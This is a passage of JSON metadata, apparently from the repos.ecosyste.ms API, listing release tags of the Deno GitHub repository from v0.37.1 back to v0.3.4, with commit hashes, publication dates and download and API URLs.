/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosy